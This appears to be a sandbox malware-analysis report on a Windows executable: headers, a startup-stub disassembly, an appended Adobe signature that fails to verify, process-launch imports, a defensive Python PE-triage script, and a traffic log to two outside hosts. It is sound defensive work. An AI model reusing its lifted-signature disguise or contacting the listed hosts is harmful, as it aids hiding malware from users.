                                                              SHA256:aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9
                                                              SHA512:4e17a9d98c1ea9db1f330d7475bed55a0c662ce5e546145eb8c1973fdf702571179a51ba39aa2c983f8ce42aa6edb1a72f1a20e9f7de78950f94076edc9527d0
                                                              SSDEEP:1536:sOzhJIRg5Xji0araoUBeV9aE4f2bmKF60N+92+na7RGJfx:sAICkZQ+gT4+aVG
                                                              TLSH:BD53F1B987441CE0C52E9B7421DA467E59B5B25672C1831372BFA4208FE8743BBBF780
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...eD............/...........................@..............................................G@......t...............J.....
                                                              Icon Hash:bdb5bd98b3f39807
                                                              Entrypoint:0x4011c0
                                                              Entrypoint Section:T10B924G
                                                              Digitally signed:true
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                              DLL Characteristics:NO_SEH
                                                              Time Stamp:0x1F8A4465 [Wed Oct 8 11:32:53 1986 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f41f41af65e0c95c3d701cfd7af8b14a
Signature Valid:false
Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the hash inside the signed blob does not match the file's Authenticode hash. This is exactly how a signature block lifted from a genuinely signed binary and appended to a different file fails, so the Adobe subject below is not evidence of origin; only a signature that verifies says anything about who built the file.)
Not Before:03/11/2023 00:00:00
Not After:04/11/2025 23:59:59
Subject Chain:
• CN=Adobe Inc., OU=Acrobat 11, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
Version:3
Thumbprint MD5:DE33CDD57B201C17BA1D948F9027EA38
Thumbprint SHA-1:8E5C0EF19E4319A5161B04C5179899335768CCC0
Thumbprint SHA-256:66048B4FFA7CEC38A851BD978E87BC469612964C9319C94005AC0FA060A6CE65
Serial:0E6E32FCB0E03A0C0B2BC04B56F2038B
Instruction (disassembly at the entry point 0x4011c0 in section T10B924G). The file is PE32+ (machine bytes "d" 0x86 right after the PE signature in the preview above, LARGE_ADDRESS_AWARE), but the listing decodes the bytes in 32-bit mode: each "dec eax" or "dec ecx" in front of a mov/lea is really a REX prefix, so "dec eax / mov ebp, esp" is "mov rbp, rsp" and "dec ecx / mov ecx, eax" is "mov r9, rax". Read that way the function is a plain MSVCRT startup stub: _controlfp, __set_app_type, __getmainargs, a call to main with argc/argv/envp from the stack slots, then exit with its return value, matching the msvcrt.dll imports listed further down. Everything after "ret" ("add byte ptr [eax], al" is zero padding, "jmp dword ptr [...]" are RIP-relative import thunks shown as absolute) is not part of the entry function.
                                                              push ebp
                                                              dec eax
                                                              mov ebp, esp
                                                              dec eax
                                                              sub esp, 00000050h
                                                              mov eax, 00000000h
                                                              mov dword ptr [ebp-20h], eax
                                                              mov edx, 00030000h
                                                              mov ecx, 00010000h
                                                              call 00007F785494EC43h
                                                              mov ecx, 00000001h
                                                              call 00007F785494EC41h
                                                              dec eax
                                                              lea eax, dword ptr [ebp-20h]
                                                              dec eax
                                                              mov dword ptr [esp+20h], eax
                                                              mov eax, 00000000h
                                                              dec ecx
                                                              mov ecx, eax
                                                              dec eax
                                                              lea eax, dword ptr [ebp-18h]
                                                              dec ecx
                                                              mov eax, eax
                                                              dec eax
                                                              lea edx, dword ptr [ebp-10h]
                                                              dec eax
                                                              lea ecx, dword ptr [ebp-04h]
                                                              call 00007F785494EC24h
                                                              dec eax
                                                              mov eax, dword ptr [ebp-18h]
                                                              dec ecx
                                                              mov eax, eax
                                                              dec eax
                                                              mov edx, dword ptr [ebp-10h]
                                                              mov ecx, dword ptr [ebp-04h]
                                                              call 00007F785494E9A1h
                                                              mov dword ptr [ebp-1Ch], eax
                                                              mov ecx, dword ptr [ebp-1Ch]
                                                              call 00007F785494EC0Eh
                                                              leave
                                                              ret
                                                              add byte ptr [eax], al
                                                              add byte ptr [ecx], al
                                                              add al, 02h
                                                              add eax, 50010304h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FD6h]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FFEh]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FFEh]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FFEh]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FBEh]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FBEh]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FBEh]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FBEh]
                                                              add byte ptr [eax], al
                                                              adc byte ptr [ebp+71h], bh
                                                              mov byte ptr [ecx], al
                                                              pushad
                                                              and dh, byte ptr [edi+00h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x21e0 | 0x3c | G8MCUXOZ
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0xc094 | SRW4MTG9
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x3000 | 0x18 | Z2TXZQUP
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd200 | 0x29c8 | SRW4MTG9
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x221c | 0x50 | G8MCUXOZ
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Note: the SECURITY entry's first field is a file offset, not an RVA (the Authenticode certificate table is never mapped into memory), so its "Is in Section" value is not meaningful; the 0x29c8-byte signature blob is appended at file offset 0xd200, after the section data, where Authenticode signatures normally live. The empty BASERELOC entry matches RELOCS_STRIPPED above; with no relocations the image can only load at 0x400000.
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
T10B924G | 0x1000 | 0x2e9 | 0x400 | e60db9a21caf1bda7fd66724d6240776 | False | 0.392578125 | data | 3.828984910677204 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
G8MCUXOZ | 0x2000 | 0x360 | 0x400 | 9ba3852e83d41097503573521acac7b9 | False | 0.333984375 | data | 4.143245199340312 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Z2TXZQUP | 0x3000 | 0x18 | 0x200 | 842ad4dd96cd5979a8d9cfca400a4eb1 | False | 0.0546875 | data | 0.2272518948570176 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
SRW4MTG9 | 0x4000 | 0xc094 | 0xc200 | 4d22c53c08a4da3f9079e168b3ca93ce | False | 0.9779719716494846 | data | 7.871980812241951 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Note: the four section names are random 8-character strings in place of .text/.data/.pdata/.rsrc, which is what the "entry point lies outside standard sections" and "non-standard names" signatures key on. The 7.87-bit entropy of SRW4MTG9 is not evidence of a packed payload: the section is the resource directory, and 0xbfc5 of its 0xc094 bytes are the already-compressed 256x256 PNG icon listed below. The entire program code is the 0x2e9-byte T10B924G section.
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x40b8 | 0xbfc5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | - | - | 0.9867598231927158
RT_GROUP_ICON | 0x10080 | 0x14 | data | - | - | 1.1
DLL | Import
msvcrt.dll | memset, _controlfp, __set_app_type, __getmainargs, exit
kernel32.dll | CreateProcessA, WaitForSingleObject, CloseHandle
Note: the import set is minimal and contains no networking, file or registry APIs. Apart from the C runtime startup functions, the binary only needs CreateProcessA, WaitForSingleObject and CloseHandle: it launches one child process, waits for it and exits, so all substantive behaviour is delegated to whatever command line it passes to CreateProcessA.
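The header-level indicators in the tables above (a build stamp older than the PE format and the signing certificate, an entry point in a non-standard section, random section names, per-section entropy) can be checked mechanically. The following is an added example, not Joe Sandbox code and not the sample: a standard-library-only PE header parser plus a triage routine, run against a synthetic PE32+ image that is constructed in the script with this report's section names and time stamp. The standard-section list, the 7.0-bit entropy threshold and the synthetic builder are this example's own assumptions.

```python
from __future__ import annotations

import math
import struct
from collections import Counter
from datetime import datetime, timezone

# Section names a normal linker emits; anything else (T10B924G, SRW4MTG9, ...) deserves a look.
# This list and the 7.0-bit entropy threshold further down are this example's own assumptions.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc",
                     ".idata", ".edata", ".bss", ".tls", ".CRT", ".xdata"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
PE_FORMAT_FIRST_YEAR = 1993  # PE shipped with Windows NT 3.1; an earlier build stamp cannot be genuine


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(image: bytes) -> dict:
    """Read the COFF time stamp, entry point RVA and section table of a PE32/PE32+ image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20                                            # optional header follows the 20-byte COFF header
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]   # AddressOfEntryPoint, same offset in PE32 and PE32+
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", image, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rawsize": rawsize, "characteristics": chars,
                         "entropy": shannon_entropy(image[rawptr:rawptr + rawsize])})
    return {"timestamp": stamp, "entry_rva": entry_rva, "sections": sections}


def triage(info: dict, cert_not_before: str = "") -> list[str]:
    """Return header-level oddities as findings; cert_not_before is an optional ISO date (YYYY-MM-DD)."""
    findings = []
    built = datetime.fromtimestamp(info["timestamp"], tz=timezone.utc)
    if built.year < PE_FORMAT_FIRST_YEAR:
        findings.append(f"timestamp {built:%Y-%m-%d} predates the PE format")
    if cert_not_before:
        not_before = datetime.fromisoformat(cert_not_before).replace(tzinfo=timezone.utc)
        if built < not_before:
            findings.append(f"timestamp {built:%Y-%m-%d} is older than the signing certificate")
    ep = info["entry_rva"]
    home = next((s for s in info["sections"]
                 if s["va"] <= ep < s["va"] + max(s["vsize"], s["rawsize"])), None)
    if home is None:
        findings.append("entry point lies outside every section")
    elif home["name"] not in STANDARD_SECTIONS:
        findings.append(f"entry point lies in non-standard section {home['name']}")
    for s in info["sections"]:
        if s["name"] not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name {s['name']}")
        if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and s["entropy"] > 7.0:
            findings.append(f"high-entropy executable section {s['name']} ({s['entropy']:.2f} bits/byte)")
    return findings


def build_sample_pe(section_names: list[str], timestamp: int, entry_rva: int = 0x11C0,
                    random_code: bool = False) -> bytes:
    """Build a minimal synthetic PE32+ image: constructed test input, not the analysed sample."""
    nsec, opt_size, align = len(section_names), 240, 0x200
    hdr_len = -(-(0x40 + 4 + 20 + opt_size + 40 * nsec) // align) * align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                    # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, nsec, timestamp, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)                      # PE32+ magic
    struct.pack_into("<I", opt, 16, entry_rva)
    table, body = bytearray(), bytearray()
    for i, name in enumerate(section_names):
        chars = 0x60000020 if i == 0 else 0x40000040           # first: code+exec+read, rest: data+read
        data = bytes(range(256)) * 2 if (i == 0 and random_code) else bytes([0x90 + i]) * align
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data),
                             0x1000 * (i + 1), len(data), hdr_len + len(body), 0, 0, 0, 0, chars)
        body += data
    return bytes((dos + b"PE\0\0" + coff + opt + table).ljust(hdr_len, b"\0") + body)


if __name__ == "__main__":
    # Same section names and build stamp as the sample; "03/11/2023" from the signature read as day/month.
    suspect = build_sample_pe(["T10B924G", "G8MCUXOZ", "Z2TXZQUP", "SRW4MTG9"], 0x1F8A4465)
    for line in triage(parse_pe(suspect), cert_not_before="2023-11-03"):
        print("[!]", line)
```

Run as-is it reports the pre-PE time stamp, the stamp being older than the certificate, the entry point in T10B924G and the four non-standard names, but no high-entropy code section, which is the same picture the tables above give: the oddities are in the headers and the signature, not in packed code.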
TCP packets (all to port 443; 101.99.75.174 is the address badlarrysguitars.com resolved to in the DNS answers below, 50.16.47.176 has no A answer in this capture)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 6, 2024 15:46:33.435518026 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:33.435568094 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:33.435623884 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:33.448215961 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:33.448245049 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:34.843921900 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:34.844001055 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:34.848283052 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:34.848294973 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:34.848680973 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:34.855680943 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:34.903328896 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.384768009 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.384799004 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.384888887 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.384922028 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.428896904 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.496285915 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.496305943 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.496371031 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.496408939 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.602927923 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.603064060 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.603138924 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.628170013 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.628326893 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.628367901 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.641913891 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.642060995 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.642090082 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.661807060 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.661863089 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.661941051 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.661951065 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.661974907 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.710166931 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.776334047 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.776348114 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.776375055 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.776417971 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.776448965 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.793514013 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.793530941 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.793678045 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.793698072 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.806876898 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.806910992 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.806952953 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.806973934 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.807014942 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.815928936 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.815988064 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.816006899 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.829207897 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.829221010 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.829282045 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.829302073 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.840646029 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.840665102 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.840734005 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.840753078 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.852010965 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.852025032 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.852094889 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.852108002 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.861280918 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.861294031 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.861368895 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.861386061 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.867438078 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.867522001 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.867538929 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.913321972 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.972336054 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.972349882 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.972373009 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.972451925 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.980093002 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.980103016 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.980134964 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.980169058 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.980186939 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:35.980195999 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.980220079 CET | 443 | 49718 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:35.980266094 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:36.005330086 CET | 49718 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:45.324609041 CET | 49758 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:45.324642897 CET | 443 | 49758 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:45.324769020 CET | 49758 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:45.324870110 CET | 49758 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:45.324883938 CET | 443 | 49758 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:46.740269899 CET | 443 | 49758 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:46.909579039 CET | 49758 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:46.909610987 CET | 443 | 49758 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:46.910907984 CET | 443 | 49758 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:46.910921097 CET | 443 | 49758 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:46.910964966 CET | 49758 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:46.910974979 CET | 443 | 49758 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:46.911010027 CET | 49758 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:46.933001995 CET | 49758 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:46.933166027 CET | 443 | 49758 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:46.933311939 CET | 49758 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:46.979325056 CET | 443 | 49758 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:47.046592951 CET | 49758 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:47.046605110 CET | 443 | 49758 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:47.249715090 CET | 49758 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:47.373769045 CET | 443 | 49758 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:47.373943090 CET | 443 | 49758 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:47.374006987 CET | 49758 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:47.377651930 CET | 49758 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:47.377686024 CET | 443 | 49758 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:47.380889893 CET | 49767 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:47.380935907 CET | 443 | 49767 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:47.381062031 CET | 49767 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:47.381256104 CET | 49767 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:47.381267071 CET | 443 | 49767 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:47.477679014 CET | 49768 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:47.477713108 CET | 443 | 49768 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:47.477777958 CET | 49768 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:47.481471062 CET | 49768 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:47.481482983 CET | 443 | 49768 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:48.793065071 CET | 443 | 49767 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:48.793498039 CET | 49767 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:48.793520927 CET | 443 | 49767 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:48.794612885 CET | 443 | 49767 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:48.794694901 CET | 49767 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:48.794703960 CET | 443 | 49767 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:48.794751883 CET | 49767 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:48.795113087 CET | 49767 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:48.795180082 CET | 443 | 49767 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:48.795264959 CET | 49767 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:48.795279026 CET | 443 | 49767 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:48.875144958 CET | 443 | 49768 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:48.875240088 CET | 49768 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:48.878096104 CET | 49768 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:48.878106117 CET | 443 | 49768 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:48.878432989 CET | 443 | 49768 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:48.895822048 CET | 49768 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:48.937237978 CET | 49767 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:48.939321995 CET | 443 | 49768 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:49.313277960 CET | 443 | 49767 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:49.313294888 CET | 443 | 49767 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:49.313369989 CET | 49767 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:49.313384056 CET | 443 | 49767 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:49.313394070 CET | 443 | 49767 | 50.16.47.176 | 192.168.2.9
Dec 6, 2024 15:46:49.313431025 CET | 49767 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:49.418998957 CET | 443 | 49768 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:49.419070005 CET | 443 | 49768 | 101.99.75.174 | 192.168.2.9
Dec 6, 2024 15:46:49.419238091 CET | 49768 | 443 | 192.168.2.9 | 101.99.75.174
Dec 6, 2024 15:46:49.489603996 CET | 49768 | 443 | 192.168.2.9 | 101.99.75.174
